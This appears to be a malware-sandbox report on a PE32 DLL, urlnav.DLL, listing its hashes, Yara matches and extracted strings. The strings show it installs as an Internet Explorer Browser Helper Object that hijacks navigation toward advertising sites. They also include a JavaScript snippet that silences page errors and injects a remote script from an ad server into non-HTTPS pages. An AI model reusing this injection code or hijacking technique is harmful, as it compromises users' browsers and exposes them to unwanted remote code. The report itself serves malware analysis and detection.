Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: cc8a11fd436b61ecdf4835922a1ce78f --

Hashes
MD5: cc8a11fd436b61ecdf4835922a1ce78f
SHA1: 26e28bd71afa63ff82339de54c56d9d38f084426
SHA256: 28ad5e823571350e7e0a1a6043c927bb18214878cb64dfaaf6529dd2c9e023a4
SSDEEP: 1536:ITeOGmHNEMLYIqT+apKlWQrSucwNRJE3LQWdqB9AUu9:YHGmRLRK2WQrS0NRJQLfdqB9AUG
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v1xx_v2xx_additional | YRP/Microsoft_Visual_Cpp_v70_DLL | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Microsoft_Visual_Cpp_60_DLL_Debug | YRP/Armadillo_v1xx_v2xx | YRP/Microsoft_Visual_Cpp_v60_DLL | YRP/Microsoft_Visual_Cpp_60 | YRP/Armadillov1xxv2xx | YRP/IsPE32 | YRP/IsDLL | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/win_registry | YRP/win_files_operation | YRP/Str_Win32_Wininet_Library |
Parent Files
0385499f81590101f91f824de30b6b8d
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
PSSh<E
PSSh4E
90u29p
t.;t$$t(
VC20XC00U
uRFGHt
YYF;5@
HHtpHHtl
^}%95\K
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
PPPPPPPP
PPPPPPPP
VWuBhH
HSVHWtgHHtF
+ttHHtd
`h````
ppxxxx
(null)
GAIsProcessorFeaturePresent
KERNEL32
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#SNAN
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
LoadLibraryA
GetModuleHandleA
GetProcAddress
GetCurrentProcessId
HeapFree
HeapAlloc
GetProcessHeap
MultiByteToWideChar
WideCharToMultiByte
lstrlenW
GetCurrentThreadId
InterlockedDecrement
GetLastError
SetLastError
GetModuleFileNameA
DisableThreadLibraryCalls
lstrcmpiA
InitializeCriticalSection
DeleteCriticalSection
LeaveCriticalSection
InterlockedIncrement
EnterCriticalSection
KERNEL32.DLL
DefWindowProcW
SetWindowLongW
CallWindowProcW
GetPropA
GetClassNameA
GetWindowThreadProcessId
SetPropA
GetWindowLongW
FindWindowExA
EnumWindows
USER32.dll
RegQueryValueExA
RegCloseKey
RegOpenKeyExA
RegSetValueExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
ATL.DLL
S2_32.dll
iphlpapi.dll
SHLWAPI.dll
WININET.dll
RtlUnwind
GetCommandLineA
GetVersion
CloseHandle
WriteFile
ExitProcess
TerminateProcess
GetCurrentProcess
HeapReAlloc
HeapSize
SetUnhandledExceptionFilter
TlsSetValue
TlsAlloc
TlsFree
TlsGetValue
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
FlushFileBuffers
SetFilePointer
SetHandleCount
GetStdHandle
GetFileType
GetStartupInfoA
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetStdHandle
GetStringTypeA
GetStringTypeW
IsBadCodePtr
LCMapStringA
LCMapStringW
GetCPInfo
GetACP
GetOEMCP
urlnav.DLL
DllCanUnloadNow
DllGetClassObject
DllRegisterServer
DllUnregisterServer
Version
SOFTWARE\Microsoft\Internet Explorer
DELETE
CONNECT
cid=0000_0001
zongyi.yisou.com
dongman.yisou.com
tv.yisou.com
dianying.yisou.com
v.tao123.com
v.yisou.com
xiu.jiabei.com/room/rand?webid=bmy_3
res://shdoclc/syntax.htm
www.paiji118.com
CabinetWClass
IEFrame
AfxWnd90s
Address Band Root
ComboBox
ComboBoxEx32
ReBarWindow32
WorkerW
http://
xiu.jiabei.com
http://xiu.jiabei.com/room/rand?webid=bmy_3
OldIEPorc
 (function(protocol){
											   if( 'https:'===protocol ) return;
											   window.onerror=function(){return true;};
											   if(document.getElementById('gngodom')) return true ;
											   if(window.gngo == undefined){ 
											   var gngo=window.gngo= document.createElement('script');
											   gngo.id = 'gngodom';
											   gngo.setAttribute('defer', 'defer') ;
											   gngo.type= 'text/javascript';
											   gngo.async= true;
											   gngo.src= 'http://ad.zzinfor.cn/static/sifu.js';
											   }
											   document.body.appendChild(window.gngo);
											})(document.location.protocol)
DELETE
CONNECT
v"djfrD
Mw.)/2
KH&l9*($m }N0da*v)7pn<x|[a1
"w=h1x*MR0`<9*.W*dkp}m>lzK;|7e
.ngQ7({x#8hm.W*)c=ag$u*~-bmGnJs0;!4&n^
\BIHJO
#np=wwOD
s	Yo&;{)i;?
TFz)kL=p<&m{e64]dk`%}-'/&1
d	Q`p*+l9*o%
	]\zLL
"|>b?X
l3y}N0e~)*hq$7Mi"d:al9*($
=w hko+1oF,0ejv}c=
LUL]S^cjw
F[	GXR
q(x5#)ueYFQ
u-mSv+3ko$"
d80l0#
/eX;|57y1LT_
9(&d-`<{F}<4$lvh2bY
*p>Ilbx65`
.4~-fh
Vt]i-ji0u)XRfq
QNLN	*
L}N0e{~r
q(>z151aw. esQu%6-j|2
T_.9&1oB
/taopid:
UrlNav
SOFTWARE\BMY
RegPath
ValueName
UncheckedValue
DefaultValue
CheckedValue
SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\
SCRIPT_ERROR_CACHE
3j*5g0z1a/m*{.t'#S[/d;lwip<0+>=_
explorer.exe
	Urlnav.Nav.1 = s 'Nav Class'
		CLSID = s '{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}'
	Urlnav.Nav = s 'Nav Class'
		CLSID = s '{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}'
	NoRemove CLSID
		ForceRemove {9A4DDA61-1D3A-49B7-9849-DAC6CD30A393} = s 'Nav Class'
			ProgID = s 'Urlnav.Nav.1'
			VersionIndependentProgID = s 'Urlnav.Nav'
			InprocServer32 = s '%MODULE%'
				val ThreadingModel = s 'Apartment'
	SOFTWARE
		Microsoft
			Windows
				CurrentVersion
					Explorer
					{
						'Browser Helper Objects'
						{
							{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}
						}
					}
stdole2.tlbWWW
URLNAVLibWWW
86ZINav
urlnav 1.0 Type LibraryWWW	
Nav ClassW
INav Interface
bKZQWW
1,171@1K1r1
2#2.2;2D2O2
8*8W8]8
;0;U;m;
<-<?<v<|<
=%=+=3=O=q=~=
>">7>K>&?D?U?z?
1,1E1N1Y1f1o1z1
272@2I2[2g2
3(3M3[3h3r3
5 505=5M5d5r5x5
5]6d6w6
8A8G8N8T8
:.:5:=:C:I:X:^:k:
;H;Z;a;
;;<C<K<
=@>F>L>Q>W>??g?
0*181A1F1
60676?6D6H6L6u6
6"7(7,70747
8M8T8X8\8`8d8h8l8p8
8X9p9w9
:b:h:l:p:t:
=(=1=[>i>o>s>x>~>
0R2Y2r2
5V5\5j5
6$6/656;6E6]6b6l6
6S7n7}7
9!979m:(;2<
60:0>0B0F0J0N0R0 1:1H1V1a1u1{1
2(222;2W2z2
6%6-626>6C6`6f6
859;9T9
<4<<<D<L<T<g<o<
>">(>5>E>K>S>q>w>
>$?<?B?N?S?
090T0d0
6+62696?6f6r6z6
7c9q9w9
:1:7:B:G:P:U:e:k:
:U;B=M=U=h=n=
2&2,2<2s2}2
2+313<3B3^3d3n3t3
:):1:7:=:~:
;I;d;l;r;x;
>6>@>a>v>
?7?\?k?z?
0)070D0I0O0
0>1!2:2o2w2
5#5,5t5
5#656;6K7P7
778=8K8
:5:@:K:P:l:
3-3J3b3
6)686Y6_6
7)737>7H7R7X7
7B8H8f8w8
9'959D9U9c9l9r9~9
9 :%:-:2:::?:d:i:
4$5*585
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2l2x2
283D3P3\3
0 0$0(0,0004080<0H0L0P0T0`0l0
1 1$1(1,1014181D1H1L1P1T1X1\1`1d1h1l1p1
6 6$6(6
6P9T9t;
;0<D<H<L<P<T<X<\<h<l<p<t<
<4?<?D?L?T?\?d?l?t?|?
3 3$3(3,3034383<3@3D3H3X3\3`3d3h3l3p3t3x3|3